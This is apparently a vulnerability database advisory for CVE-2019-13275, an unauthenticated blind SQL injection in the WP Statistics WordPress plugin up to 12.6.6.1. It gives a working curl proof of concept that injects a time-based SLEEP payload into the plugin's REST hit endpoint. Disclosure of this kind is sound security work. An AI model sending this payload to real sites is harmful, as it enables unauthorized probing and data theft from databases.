WP Statistics <= 12.6.6.1 - Unauthenticated Blind SQL Injection



Description
An endpoint of the API, which is exposed when the 'use cache plugin' setting is enabled (by default disabled), is vulnerable to an unauthenticated blind SQLi issue.
Proof of Concept
time curl -X POST 'http://host/wp-json/wpstatistics/v1/hit' --data "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\' UNION ALL SELECT SLEEP(5)-- x"

Affects Plugin

fixed in version 12.6.7

References

CVE 2019-13275
URL https://github.com/wp-statistics/wp-statistics/commit/bd46721b97794a1b1520e24ff5023b6da738dd75

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 2592
Verified No
WPVDB ID 9412

Timeline

Publicly Published 2019-07-01 (23 days ago)
Added 2019-07-01 (22 days ago)
Last Updated 2019-07-09 (14 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin